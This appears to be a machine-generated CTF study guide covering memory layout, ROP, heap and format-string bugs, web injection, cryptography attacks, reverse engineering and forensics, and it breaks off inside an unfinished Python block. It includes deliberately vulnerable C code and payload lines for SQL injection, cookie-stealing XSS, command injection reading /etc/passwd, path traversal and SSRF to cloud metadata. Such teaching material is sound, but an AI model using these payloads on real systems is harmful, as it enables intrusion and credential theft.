By wikipedia auto curator•March 16, 2026•

Capture the flag (cybersecurity) (Wikipedia Lab Guide)

Cybersecurity Capture the Flag (CTF): A Technical Study Guide

1) Introduction and Scope

Cybersecurity Capture the Flag (CTF) exercises are highly structured, adversarial simulations designed to rigorously test and enhance an individual's or team's proficiency across a broad spectrum of computer security disciplines. These challenges, drawing inspiration from the traditional outdoor game, require participants to discover and extract "flags" – typically specific strings of text, cryptographic keys, or sensitive data structures – embedded within intentionally vulnerable systems, applications, network protocols, or data artifacts. CTFs serve as a cornerstone for practical skill development, providing invaluable hands-on experience in both offensive and defensive security techniques in a controlled, ethical environment.

This study guide covers the technical mechanics of CTF challenges: the common challenge categories, fundamental exploitation methodologies, and the theoretical foundations needed to analyze them. It goes beyond a high-level overview to cover memory layouts, low-level exploits, and worked examples. The objective is to provide a technically dense, actionable resource for participants who want to deepen their understanding and practical application of cybersecurity principles through CTF engagement.

2) Deep Technical Foundations

CTF challenges are fundamentally built upon a robust foundation of core computer science and cybersecurity principles. A thorough comprehension of these concepts is paramount for effectively dissecting, analyzing, and ultimately solving complex security puzzles.

2.1) Operating System Internals

A deep understanding of how operating systems manage resources and execute code is critical for many CTF categories, particularly binary exploitation and privilege escalation.

Memory Management: Concepts such as the stack, heap, data segments (.data, .bss), and their respective allocation and management mechanisms are foundational for understanding memory corruption vulnerabilities.
- Stack: A region of memory that grows downwards from a high address. It stores local variables, function arguments, return addresses, and saved base pointers (EBP/RBP). Function calls create stack frames.
- Heap: A region of memory used for dynamic memory allocation via functions like malloc, calloc, realloc, and free. Vulnerabilities here often exploit corrupted metadata (e.g., malloc chunk headers, tcache pointers) to achieve arbitrary read/write primitives.
- Example (C Stack Layout):
```
High Memory Addresses
+-------------------+
| Function Arguments|
+-------------------+
| Return Address    | <--- Target for overwrite in buffer overflow
+-------------------+
| Saved Base Pointer| (EBP/RBP)
+-------------------+
| Local Variables   |
| (e.g., buffer)    | <--- Overflow starts here
+-------------------+
Low Memory Addresses
```
- Example (C Program with Buffer Overflow):
```
#include <stdio.h>
#include <string.h>

void vulnerable_function(char* input) {
    char buffer[64];
    // strcpy is inherently unsafe as it doesn't check buffer size.
    strcpy(buffer, input); // Potential buffer overflow if input > 63 bytes
    printf("Input processed: %s\n", buffer);
}

int main(int argc, char** argv) {
    if (argc > 1) {
        vulnerable_function(argv[1]);
    } else {
        printf("Usage: %s <input>\n", argv[0]);
    }
    return 0;
}
```
  An input string exceeding 63 characters (plus null terminator) will overwrite adjacent memory on the stack, potentially corrupting the saved EBP/RBP and the return address, leading to control flow hijacking.
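The effect of the overflow can be modeled without touching real memory. The following Python sketch is an illustration only: it treats a stack frame as a flat byte array laid out as buffer, saved RBP, return address (lowest address first). The sentinel addresses are hypothetical, and real compilers may add padding or a canary between these fields.

```python
import struct

BUF_SIZE = 64                 # size of `buffer` in vulnerable_function
SAVED_RBP = 0x7FFFFFFFE000    # hypothetical saved base pointer
RET_ADDR = 0x401150           # hypothetical legitimate return address


def make_frame() -> bytearray:
    """Model a frame as: buffer | saved RBP | return address (low -> high)."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", SAVED_RBP, RET_ADDR))


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Mimic strcpy: copy every byte starting at the buffer, ignoring its size."""
    frame[0:len(data)] = data


def return_address(frame: bytearray) -> int:
    """Read the 8-byte little-endian return address stored after saved RBP."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


# Case 1: a short input stays inside the buffer.
frame = make_frame()
unchecked_copy(frame, b"A" * 16)
safe_ret = return_address(frame)

# Case 2: 72 bytes of padding followed by 8 attacker-chosen bytes.
frame = make_frame()
payload = b"A" * (BUF_SIZE + 8) + struct.pack("<Q", 0xDEADBEEF)
unchecked_copy(frame, payload)
hijacked_ret = return_address(frame)

print(hex(safe_ret), hex(hijacked_ret))
```

The 72-byte padding in the second case is the buffer size plus the saved base pointer, which is why exploit scripts for this kind of layout typically start with an offset of that size.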
Process Execution and Control: Understanding program loading, execution context, system calls, and privilege levels is crucial for privilege escalation and understanding program behavior.
- System Calls: The interface between user-space applications and the operating system kernel. Key syscalls include execve (execute program), read/write (I/O), mmap (memory mapping), open (file access), socket (networking).
- Privilege Escalation: Exploiting misconfigurations or vulnerabilities (e.g., weak file permissions, vulnerable SUID binaries, kernel exploits) to gain elevated privileges, typically from a standard user to root.
- SUID/SGID Bits: Special file permissions that allow a program to execute with the privileges of the file owner (SUID) or group (SGID), even when invoked by a different user. A vulnerable SUID binary owned by root is a prime target.
  - Example (Bash): chmod u+s /usr/local/bin/my_privileged_tool sets the SUID bit for my_privileged_tool.
File Systems and Permissions: Knowledge of file ownership, standard Unix permissions (rwx), Access Control Lists (ACLs), and special file attributes is vital for forensics and privilege escalation.
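As a rough illustration of how SUID enumeration might be scripted during privilege escalation, the sketch below walks a directory tree and reports regular files with the set-user-ID bit. The function names are hypothetical helpers, not part of any standard tool.

```python
import os
import stat


def has_suid(mode: int) -> bool:
    """Return True if the mode bits include set-user-ID."""
    return bool(mode & stat.S_ISUID)


def find_suid_files(root: str):
    """Yield (path, owner_uid) for regular files under `root` with the SUID bit set."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks
            except OSError:
                continue              # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and has_suid(st.st_mode):
                yield path, st.st_uid


# Pure-function check on two hypothetical modes: rwsr-xr-x and rwxr-xr-x.
print(has_suid(0o104755), has_suid(0o100755))
```

On a real system the same search is usually done with find / -perm -4000 -type f 2>/dev/null; entries owned by UID 0 are the interesting ones.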

2.2) Networking Fundamentals

A deep grasp of network protocols and services is essential for network-based challenges, packet analysis, and understanding client-server interactions.

TCP/IP Stack: Comprehensive understanding of the Internet Protocol (IP), Transmission Control Protocol (TCP), User Datagram Protocol (UDP), and Internet Control Message Protocol (ICMP), including their packet structures and state transitions.
- TCP Header Fields: Essential fields include SYN (synchronize), ACK (acknowledge), FIN (finish) flags, Sequence Numbers (SEQ), Acknowledgment Numbers (ACK), Window Size. Understanding these is key for TCP session hijacking, spoofing, and analysis.
- UDP: Connectionless, datagram-based protocol. Lacks reliability guarantees (no retransmissions, ordering). Commonly used for DNS, VoIP, and streaming.
- Packet Analysis: Proficiency with tools like Wireshark is critical for dissecting network traffic, identifying protocols, extracting data, and reverse-engineering network protocols.
Common Network Services: Familiarity with the protocols, typical ports, and common vulnerabilities of services like HTTP/S, FTP, SSH, DNS, SMB, SMTP, POP3, IMAP, and databases is crucial.
- HTTP Request/Response Structure: Understanding methods (GET, POST, PUT, DELETE), headers (Content-Type, User-Agent, Cookie, Authorization), and status codes (200, 301, 401, 403, 404, 500) is fundamental for web exploitation.
- DNS: Domain Name System resolution. Understanding record types (A, AAAA, CNAME, MX, TXT) and potential vulnerabilities like DNS tunneling for data exfiltration.
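To make the TCP header fields above concrete, here is a minimal sketch that decodes the fixed 20-byte part of a TCP header with the standard struct module. The sample header is hand-built with hypothetical port and sequence values; options and checksum validation are ignored.

```python
import struct

# Flag bits in the low 6 bits of the offset/flags word.
TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}


def parse_tcp_header(raw: bytes) -> dict:
    """Decode the fixed 20-byte portion of a TCP header (network byte order)."""
    src, dst, seq, ack, off_flags, window, _checksum, _urgent = struct.unpack(
        "!HHIIHHHH", raw[:20]
    )
    flag_bits = off_flags & 0x3F
    return {
        "src_port": src,
        "dst_port": dst,
        "seq": seq,
        "ack": ack,
        "header_len": (off_flags >> 12) * 4,   # data offset is in 32-bit words
        "flags": [name for bit, name in TCP_FLAGS.items() if flag_bits & bit],
        "window": window,
    }


# Hypothetical SYN-ACK segment from port 80 to port 51000.
sample = struct.pack("!HHIIHHHH", 80, 51000, 1000, 2001, (5 << 12) | 0x12, 65535, 0, 0)
info = parse_tcp_header(sample)
print(info)
```

Wireshark shows the same fields in its packet details pane; parsing them by hand is mostly useful when a challenge uses a custom or malformed capture.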

2.3) Cryptography

CTFs often involve breaking, implementing, or verifying cryptographic primitives.

Symmetric Encryption: Algorithms like AES, DES, ChaCha20 that use a single key for encryption and decryption. Understanding modes of operation is vital.
- Modes of Operation:
  - ECB (Electronic Codebook): Each block is encrypted independently. Identical plaintext blocks produce identical ciphertext blocks, revealing patterns. Highly insecure for most applications.
  - CBC (Cipher Block Chaining): Each plaintext block is XORed with the previous ciphertext block before encryption. Requires an Initialization Vector (IV) for the first block. Provides diffusion.
  - CTR (Counter Mode): Turns a block cipher into a stream cipher. Generates a keystream by encrypting a counter. Allows parallelization and random access.
- Example (Conceptual CBC Encryption):
```
Plaintext:  [BLOCK P1] [BLOCK P2] [BLOCK P3]
IV:         [      IV      ]
Ciphertext: [ENC(P1 XOR IV)] [ENC(P2 XOR ENC(P1 XOR IV))] [ENC(P3 XOR ENC(P2 XOR ENC(P1 XOR IV)))]
```
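The pattern leak described for ECB is easy to test for: identical plaintext blocks give identical ciphertext blocks, so repeated 16-byte blocks are a strong hint. The sketch below counts such repeats. The two inputs are hand-made stand-ins for ciphertext, not real cipher output.

```python
from collections import Counter

BLOCK = 16  # AES block size in bytes


def repeated_blocks(ciphertext: bytes, block_size: int = BLOCK) -> int:
    """Count how many blocks are duplicates of an earlier block."""
    blocks = [ciphertext[i:i + block_size] for i in range(0, len(ciphertext), block_size)]
    counts = Counter(blocks)
    return sum(n - 1 for n in counts.values() if n > 1)


# Stand-in for ECB output: the same block three times, then a different block.
ecb_like = bytes.fromhex("00112233445566778899aabbccddeeff") * 3 + bytes(range(16))
# Stand-in for CBC/CTR output: four distinct blocks.
chained_like = bytes(range(64))

print(repeated_blocks(ecb_like), repeated_blocks(chained_like))
```

A nonzero count on a long ciphertext suggests ECB; a zero count does not prove another mode, since the plaintext may simply contain no repeated blocks.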
Asymmetric Encryption: Algorithms like RSA and ECC that use a pair of keys (public and private).
- RSA: Based on the difficulty of factoring large numbers. Vulnerabilities include using small public exponents (e), weak key generation, and padding oracle attacks.
- ECC (Elliptic Curve Cryptography): Offers equivalent security to RSA with smaller key sizes, making it more efficient. Attacks often target weak curve parameters or discrete logarithm problems.
Hashing: Functions like MD5, SHA-1, SHA-256, SHA-3 that produce fixed-size digests. Key properties are one-wayness and collision resistance.
- Attacks: Brute-force, rainbow tables (for password hashing), and length extension attacks (for MD5, SHA-1, and some SHA-2 variants when used improperly).
- Length Extension Attack: If H(secret || message) is known and the length of secret is known, an attacker can compute H(secret || message || padding || appended_message) without knowing secret. This is mitigated by using HMAC (Hash-based Message Authentication Code).
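The HMAC mitigation mentioned above can be sketched with Python's standard hmac module. The key and message are hypothetical; the point is the contrast between the naive H(secret || message) construction and HMAC, together with a constant-time comparison on verification.

```python
import hashlib
import hmac

secret = b"hypothetical-server-key"
message = b"user=guest&role=user"

# Naive construction: SHA-256 over secret || message (extendable by an attacker).
naive_tag = hashlib.sha256(secret + message).hexdigest()

# HMAC construction: not vulnerable to length extension.
hmac_tag = hmac.new(secret, message, hashlib.sha256).hexdigest()


def verify(key: bytes, msg: bytes, tag_hex: str) -> bool:
    """Recompute the HMAC and compare in constant time."""
    expected = hmac.new(key, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag_hex)


print(verify(secret, message, hmac_tag))
print(verify(secret, message + b"&role=admin", hmac_tag))
```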
Encoding and Obfuscation: Techniques like Base64, Hexadecimal, URL encoding, and simple ciphers (ROT13, XOR) are often used to obscure flags or data.
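A short sketch of reversing the encodings listed above, using only the standard library. The flag string and the single-byte XOR key 0x42 are made up for illustration.

```python
import base64
import codecs
from urllib.parse import unquote

flag = "flag{example}"  # hypothetical flag

# Encode the flag in several common ways.
hex_form = flag.encode().hex()
b64_form = base64.b64encode(flag.encode()).decode()
rot13_form = codecs.encode(flag, "rot_13")
xor_form = bytes(b ^ 0x42 for b in flag.encode())

# Reverse each encoding.
decoded = {
    "hex": bytes.fromhex(hex_form).decode(),
    "base64": base64.b64decode(b64_form).decode(),
    "rot13": codecs.decode(rot13_form, "rot_13"),
    "url": unquote("flag%7Bexample%7D"),
    "xor": bytes(b ^ 0x42 for b in xor_form).decode(),
}

for name, value in decoded.items():
    print(name, value)
```

In challenges these layers are often stacked, so decoding usually means applying such steps repeatedly until a recognizable flag format appears.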

2.4) Programming and Scripting Languages

Proficiency in relevant programming languages is essential for developing exploits, analyzing code, and automating tasks.

Python: The de facto standard for CTFs due to its extensive libraries for networking (socket), web requests (requests), cryptography (cryptography), and exploit development (pwntools).
C/C++: Crucial for understanding low-level vulnerabilities (buffer overflows, heap corruption, format string bugs) and for reverse engineering.
Bash/Shell Scripting: Useful for system administration tasks, automation, and understanding command-line exploits.
JavaScript: Essential for web exploitation, particularly for understanding client-side logic, DOM manipulation, and XSS vulnerabilities.

3) Internal Mechanics / Architecture Details

CTF challenges often require a deep dive into the internal workings and architectural specifics of software and hardware components.

3.1) Binary Exploitation (Pwn)

This category focuses on identifying and exploiting vulnerabilities in compiled programs, typically written in C/C++.

Memory Layout of a Process (Simplified):

+-------------------+  <- High Memory Addresses
|       Stack       |  (Local vars, return addresses, function args)
+-------------------+
|       Heap        |  (Dynamically allocated memory via malloc)
+-------------------+
|       BSS         |  (.bss: Uninitialized global/static variables)
+-------------------+
|       Data        |  (.data: Initialized global/static variables)
+-------------------+
|       Text        |  (.text: Program code, read-only)
+-------------------+  <- Low Memory Addresses

Stack-Based Buffer Overflows:
- Vulnerability: Occurs when a program writes data to a buffer on the stack without adequate bounds checking, overwriting adjacent stack data, including the return address. Functions like strcpy, gets, sprintf are common culprits.
- Exploitation: The primary goal is to overwrite the function's return address with a value that redirects execution flow to attacker-controlled code (shellcode) or to existing code snippets (ROP gadgets).
- Example (Conceptual Stack Frame Corruption):
```
[ High Memory Addresses ]
-------------------------
... caller's stack data ...
-------------------------
[ Function Arguments ] (stack-passed, if any)
-------------------------
[ Return Address ] <--- Target for overwrite
-------------------------
[ Saved RBP/EBP ]
-------------------------
[ Local Variables (e.g., 'buffer[64]') ] <--- Overflow starts here and writes upwards
-------------------------
[ Low Memory Addresses; the stack grows downwards ]
```
- Return-Oriented Programming (ROP): A technique used when NX (No-Execute) protection is enabled, preventing direct execution of shellcode from the stack. ROP chains together small sequences of existing instructions ("gadgets") within the program's code or loaded libraries. Each gadget typically ends with a ret instruction, allowing the chain to be executed sequentially.
  - Gadget Example: pop rdi; ret (Pops a value from the stack into the rdi register, then returns to the address stored in the next stack slot, which is the next gadget in the chain).
  - ROP Chain Example (for execve("/bin/sh", NULL, NULL) on x86-64 Linux):
    1. Locate the address of the string "/bin/sh" in memory.
    2. Find gadgets for pop rdi; ret, pop rsi; ret, pop rdx; ret, pop rax; ret.
    3. Find the address of the syscall instruction.
    4. Construct the chain on the stack:
      - Address of pop rdi; ret gadget.
      - Address of "/bin/sh" string (argument for rdi).
      - Address of pop rsi; ret gadget.
      - 0 (NULL for rsi).
      - Address of pop rdx; ret gadget.
      - 0 (NULL for rdx).
      - Address of pop rax; ret gadget.
      - 59 (Syscall number for execve).
      - Address of syscall instruction.
    5. The return address on the stack is overwritten with the address of the first gadget.
Heap Exploitation: Involves exploiting vulnerabilities in dynamically allocated memory.
- Vulnerabilities: Use-after-free, double-free, heap overflow, heap metadata corruption.
- Techniques: Manipulating the internal structures of the memory allocator (e.g., glibc's ptmalloc2, which is derived from dlmalloc) to achieve arbitrary write primitives. This often involves corrupting forward/backward pointers (fd/bk) in freed malloc chunks.
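- tcache (Thread-Local Cache): A fast per-thread cache for small allocations, introduced in glibc 2.26. Vulnerabilities like tcache poisoning allow an attacker to overwrite the next pointer of a freed tcache chunk (stored where fd would be) so that a later malloc returns an arbitrary address, enabling overwrites of critical data structures or function pointers. Since glibc 2.32, safe-linking obfuscates this pointer, so a heap address leak is usually needed first.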
Format String Vulnerabilities:
- Vulnerability: Occurs when user-controlled input is directly used as the format string argument in functions like printf, sprintf, fprintf.
- Example: printf(user_controlled_string);
- Exploitation: Attackers can leverage format specifiers like %n (writes the number of bytes printed so far to a memory address specified by the corresponding argument on the stack) to achieve arbitrary memory writes.
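  - printf("AAAA%n"); writes 4 to the address taken from the argument slot that %n consumes.
  - printf("AAAA%10x%n"); writes 14 to the address: 4 characters for AAAA plus 10 for the padded %10x. The %10x also consumes one argument, so %n uses the one after it.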
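The arithmetic behind %n writes can be sketched as follows. Real exploits usually write one byte at a time with %hhn, which stores the output counter modulo 256, so each step needs just enough padding to bring the counter to the next target byte. The helper names and the target value are hypothetical, and building the full format string is omitted because argument positions depend on the target.

```python
def hhn_paddings(value: int, num_bytes: int, already_printed: int = 0) -> list:
    """Padding needed before each %hhn so that (count % 256) equals the next
    byte of `value`, least significant byte first."""
    pads = []
    printed = already_printed
    for i in range(num_bytes):
        target = (value >> (8 * i)) & 0xFF
        pad = (target - printed) % 256
        pads.append(pad)
        printed += pad
    return pads


def simulate_counts(pads: list, already_printed: int = 0) -> list:
    """Replay the paddings and return the low byte of the counter at each write."""
    written, printed = [], already_printed
    for pad in pads:
        printed += pad
        written.append(printed & 0xFF)
    return written


# The counter for "AAAA%10x%n": 4 literal characters plus a 10-wide field.
count_before_n = len("AAAA" + "%10x" % 0x1234)

target_value = 0x401136  # hypothetical 3-byte value to write
pads = hhn_paddings(target_value, num_bytes=3)
print(count_before_n, pads, [hex(b) for b in simulate_counts(pads)])
```

A computed padding of 0 needs special handling in practice, because a width specifier such as %0c still prints one character.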

3.2) Web Exploitation (Web)

This category focuses on vulnerabilities within web applications, servers, and APIs.

HTTP Protocol Manipulation and Injection Attacks:
- SQL Injection (SQLi): Injecting malicious SQL code into application input fields to manipulate database queries.
  - Example (Authentication Bypass): admin' OR '1'='1 in the username field.
  - Example (Data Extraction): 1' UNION SELECT username, password FROM users -- to retrieve user credentials.
- Cross-Site Scripting (XSS): Injecting malicious client-side scripts (typically JavaScript) into web pages viewed by other users.
  - Reflected XSS: The injected script is immediately returned from the web server in the response.
  - Stored XSS: The injected script is permanently stored on the target server (e.g., in a database) and served to users.
  - DOM-based XSS: The vulnerability lies in the client-side JavaScript code that manipulates the Document Object Model (DOM).
  - Example: <script>alert(document.cookie)</script>
- Command Injection: Injecting operating system commands through vulnerable application inputs that are passed to shell commands.
  - Example: 127.0.0.1; cat /etc/passwd in a ping utility input.
- File Inclusion Vulnerabilities:
  - Local File Inclusion (LFI): Including and executing local files on the server, often used to read sensitive files like /etc/passwd, configuration files, or application source code.
  - Remote File Inclusion (RFI): Including and executing files from a remote server, which can lead to arbitrary code execution.
  - Example (LFI): ?page=../../../../etc/passwd
- Server-Side Request Forgery (SSRF): Tricking the server into making unintended requests to internal or external resources. This can be used to scan internal networks, access cloud metadata endpoints, or interact with internal services.
  - Example: http://example.com/fetch?url=http://169.254.169.254/latest/meta-data/ to access AWS EC2 instance metadata.
Web Application Architectures: Understanding the interplay between front-end (HTML, CSS, JavaScript, frameworks like React, Angular, Vue) and back-end technologies (Python/Django/Flask, Node.js/Express, PHP/Laravel, Ruby/Rails) is crucial.
- APIs (REST, GraphQL): Insecure Direct Object References (IDOR), broken access control, and injection vulnerabilities are common in API endpoints.
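The authentication-bypass payload from the SQL injection example can be reproduced safely against an in-memory SQLite database. This is a minimal sketch with a made-up users table and credentials. It contrasts a query built by string interpolation with a parameterized one.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")


def login_vulnerable(username: str, password: str) -> bool:
    # String interpolation lets input change the structure of the query.
    query = (
        f"SELECT * FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(username: str, password: str) -> bool:
    # Placeholders keep input as data; it can never become SQL syntax.
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


payload = "admin' OR '1'='1"
print(login_vulnerable(payload, "wrong"), login_parameterized(payload, "wrong"))
```

The bypass works because AND binds tighter than OR, so the WHERE clause becomes username = 'admin' OR ('1'='1' AND password = 'wrong'), which is true for the admin row.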

3.3) Cryptography (Crypto)

Challenges in this category involve breaking, analyzing, or implementing cryptographic primitives.

Classical Ciphers: Techniques like Caesar, Vigenère, substitution, and transposition ciphers. Frequency analysis is a primary tool for breaking these.
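As a small illustration of frequency-based cryptanalysis, the sketch below brute-forces a Caesar cipher by trying all 26 shifts and keeping the candidate with the most common English letters. The scoring set and the sample sentence are arbitrary choices; very short or unusual texts can defeat such a crude score.

```python
import string


def caesar_shift(text: str, shift: int) -> str:
    """Shift alphabetic characters by `shift` positions, preserving case."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def crack_caesar(ciphertext: str):
    """Return (shift, plaintext) for the shift whose output looks most English."""
    common = set("etaoinshr")

    def score(candidate: str) -> int:
        return sum(1 for c in candidate.lower() if c in common)

    best = max(range(26), key=lambda s: score(caesar_shift(ciphertext, -s)))
    return best, caesar_shift(ciphertext, -best)


plaintext = "the secret is hidden in the seventh sentence"
ciphertext = caesar_shift(plaintext, 7)
shift, recovered = crack_caesar(ciphertext)
print(shift, recovered)
```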
Modern Cryptography:
- Padding Oracle Attacks: Exploiting how a server handles padding errors in block ciphers (e.g., AES in CBC mode) to decrypt ciphertext or forge messages without knowing the key. The server reveals whether padding is correct or incorrect, allowing an attacker to iteratively decrypt blocks.
- RSA Attacks: Exploiting mathematical weaknesses such as small public exponents (e), weak prime generation (p, q), common modulus attacks (if the same modulus N is used with different public exponents), or factoring N.
- Elliptic Curve Attacks: Vulnerabilities can arise from weak curve parameters, small subgroup attacks, or side-channel leakage.
- Hash Collisions: Finding two distinct inputs that produce the same hash output. While difficult for strong hashes like SHA-256, it can be relevant for older hashes (MD5, SHA-1) or specific implementations.
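One of the RSA weaknesses listed above, a small public exponent used without padding, can be shown with plain integer arithmetic. If m^e is smaller than N, the modular reduction never happens and the plaintext is just the integer e-th root of the ciphertext. The modulus below is a toy value built from two Mersenne primes, and the message is hypothetical.

```python
def integer_root(n: int, k: int) -> int:
    """Largest r with r**k <= n, found by binary search on exact integers."""
    lo, hi = 0, 1
    while hi ** k <= n:
        hi *= 2
    # Invariant: lo**k <= n < hi**k
    while lo < hi - 1:
        mid = (lo + hi) // 2
        if mid ** k <= n:
            lo = mid
        else:
            hi = mid
    return lo


# Toy parameters for illustration only.
p = 2**127 - 1
q = 2**89 - 1
N = p * q
e = 3

m = int.from_bytes(b"flag{e3}", "big")   # 64-bit message, so m**3 < N
c = pow(m, e, N)                          # textbook RSA, no padding

recovered = integer_root(c, e)
print(recovered.to_bytes(8, "big"))
```

Floating-point roots lose precision for numbers of this size, which is why the sketch uses exact integer binary search.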
Steganography: The art of hiding data within other non-secret data (e.g., images, audio).
- LSB (Least Significant Bit) Manipulation: Replacing the least significant bit(s) of pixel color values in an image with bits from the secret message. This causes minimal visual distortion.
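LSB embedding and extraction can be sketched on a plain byte sequence standing in for raw pixel channel values. Real challenges would first decode the image (for example with an imaging library) and may use a different bit order or channel selection. The layout here, one secret bit per cover byte with the most significant bit first, is an assumption.

```python
def embed_lsb(cover: bytes, secret: bytes) -> bytes:
    """Hide `secret` in the least significant bit of successive cover bytes."""
    bits = [(byte >> (7 - i)) & 1 for byte in secret for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover is too small for the secret")
    stego = bytearray(cover)
    for idx, bit in enumerate(bits):
        stego[idx] = (stego[idx] & 0xFE) | bit   # clear the LSB, then set it
    return bytes(stego)


def extract_lsb(stego: bytes, n_bytes: int) -> bytes:
    """Rebuild `n_bytes` of hidden data from the LSBs of the first 8*n_bytes bytes."""
    out = bytearray()
    for i in range(n_bytes):
        value = 0
        for b in stego[i * 8:(i + 1) * 8]:
            value = (value << 1) | (b & 1)
        out.append(value)
    return bytes(out)


cover = bytes(range(256))        # stand-in for raw pixel channel values
secret = b"CTF{lsb}"
stego = embed_lsb(cover, secret)
print(extract_lsb(stego, len(secret)))
```

Each cover byte changes by at most 1, which is why the distortion is visually negligible.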

3.4) Reverse Engineering (RE)

This discipline involves analyzing compiled binaries to understand their functionality, discover hidden logic, extract secrets, or identify vulnerabilities.

Disassemblers and Decompilers: Tools like IDA Pro, Ghidra, radare2, and Binary Ninja translate machine code into human-readable assembly language or pseudo-C code, facilitating analysis.
Debuggers: GDB, WinDbg, x64dbg allow for dynamic analysis by stepping through code execution, inspecting registers and memory, setting breakpoints, and modifying program state.
Assembly Language: Understanding the instruction sets of target architectures (e.g., x86, x86-64, ARM) is fundamental.
- x86-64 Registers (Commonly Used):
  - RAX: Accumulator, typically holds return values and syscall numbers.
  - RDI, RSI, RDX, RCX, R8, R9: Argument registers for function calls (System V AMD64 ABI). For raw Linux syscalls, R10 takes the place of RCX as the fourth argument.
  - RBP: Base Pointer, used to access local variables and arguments within a stack frame.
  - RSP: Stack Pointer, points to the top of the stack.
  - RIP: Instruction Pointer, points to the next instruction to be executed.
- Example (x86-64 Assembly Snippet for execve):
```
mov rax, 0x3b       ; Load syscall number for execve into RAX
mov rdi, 0x402000   ; Load address of "/bin/sh" string into RDI (1st arg)
xor rsi, rsi        ; Zero out RSI (2nd arg: argv, NULL)
xor rdx, rdx        ; Zero out RDX (3rd arg: envp, NULL)
syscall             ; Invoke the kernel to execute the syscall
```
Obfuscation Techniques: Challenge and malware authors may employ techniques like control flow flattening, opaque predicates, anti-debugging checks, and code virtualization to hinder reverse engineering efforts.

3.5) Forensics

This category involves analyzing digital artifacts to reconstruct events, recover hidden information, or identify malicious activity.

File System Analysis: Examining file systems to recover deleted files, analyze file metadata (timestamps, permissions, ownership), and identify evidence of data manipulation. Common tools include extundelete, foremost, and scalpel.
Memory Forensics: Analyzing RAM dumps to extract volatile information such as running processes, network connections, loaded modules, cryptographic keys, and even plaintext passwords. Tools like Volatility Framework are essential.
Network Forensics: Analyzing packet captures (PCAP files) to reconstruct network traffic, identify malicious communications, extract transferred files, and trace network activity. Wireshark is indispensable here.
Malware Analysis: Static analysis (examining code without execution) and dynamic analysis (observing behavior in a controlled environment) of malicious software.
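File carving, the technique behind tools such as foremost and scalpel, can be sketched as a search for known header and trailer signatures. The example below looks for the PNG signature and the fixed IEND trailer inside a byte blob. The blob is synthetic, and real carvers also validate the structure between the two markers.

```python
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"      # 8-byte PNG file signature
PNG_END = b"IEND\xaeB`\x82"           # IEND chunk type followed by its fixed CRC


def carve_png(blob: bytes) -> list:
    """Return every byte range that starts with the PNG signature and ends at IEND."""
    found = []
    start = blob.find(PNG_MAGIC)
    while start != -1:
        end = blob.find(PNG_END, start)
        if end == -1:
            break                      # header without trailer: truncated file
        found.append(blob[start:end + len(PNG_END)])
        start = blob.find(PNG_MAGIC, end)
    return found


# Synthetic "disk image": two fake PNG bodies surrounded by unrelated bytes.
fake_png = PNG_MAGIC + b"<chunks>" + b"\x00\x00\x00\x00" + PNG_END
blob = b"junk" * 4 + fake_png + b"\x00" * 10 + fake_png + b"tail"

carved = carve_png(blob)
print(len(carved), [len(c) for c in carved])
```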

4) Practical Technical Examples

4.1) Binary Exploitation: Simple Stack Overflow with NX Bypass (ROP)

Challenge: A Linux executable with a stack buffer overflow vulnerability, and the NX (No-Execute) bit enabled. The goal is to execute /bin/sh.

Vulnerable Code (vuln.c):

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void greet(void) {
    char buffer[64];
    // Unsafe: read() accepts up to 256 bytes into a 64-byte buffer.
    // Unlike strcpy, it does not stop at NUL bytes, so a ROP chain made of
    // 64-bit addresses can be delivered intact over stdin.
    read(STDIN_FILENO, buffer, 256);
    printf("Hello, %s!\n", buffer);
}

int main(void) {
    puts("Enter your name:");
    greet();
    return 0;
}

Compilation (for demonstration):
Real CTF binaries usually ship with more protections enabled. For this exercise we disable stack canaries and PIE but keep NX on, so that a ROP chain is required:

# -fno-stack-protector: Disables stack canaries.
# -no-pie: Disables Position Independent Executable, making code addresses static.
# -z noexecstack: Marks the stack non-executable (NX).
gcc -fno-stack-protector -no-pie -z noexecstack -o vuln vuln.c
# For a classic shellcode-on-the-stack exercise instead, replace -z noexecstack with -z execstack.

Exploitation Steps:

Information Gathering:
- Use checksec vuln to confirm protections (NX enabled, PIE disabled, Canary disabled).
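- Use gdb ./vuln to find the offset to the return address. A common technique is to feed the program a cyclic pattern (cyclic 100 from pwntools, or pattern create 100 in GDB extensions such as GEF or PEDA) and look up the bytes that land in the return address slot after the crash. On x86-64 a non-canonical return address faults at the ret instruction itself, so the pattern bytes are typically read from the top of the stack (RSP) rather than from RIP. Let's assume the offset is 72 bytes (64 bytes of buffer plus 8 bytes of saved RBP).
- Find useful ROP gadgets. We need gadgets to load values into registers and a syscall instruction.
  - objdump -d vuln, ropper --file ./vuln, or ROPgadget --binary ./vuln can help find gadgets.
  - Gadgets needed: pop rdi; ret, pop rsi; ret, pop rdx; ret, pop rax; ret, syscall. A small dynamically linked binary rarely contains all of these; in practice they often come from libc (once its base address is known) or from a statically linked binary.
- Locate the address of the string "/bin/sh" within the binary or its loaded libraries. If PIE is disabled, addresses inside the binary itself are static; library addresses are still subject to ASLR.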
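The offset-finding step can be sketched without external tools. The code below generates a non-repeating pattern in the style of the classic Aa0Aa1Aa2... sequence and looks up where a crashed value falls inside it. It is a simplified stand-in for pwntools' cyclic helpers, and the "observed" bytes are taken from the pattern itself to simulate what a debugger would show.

```python
import string


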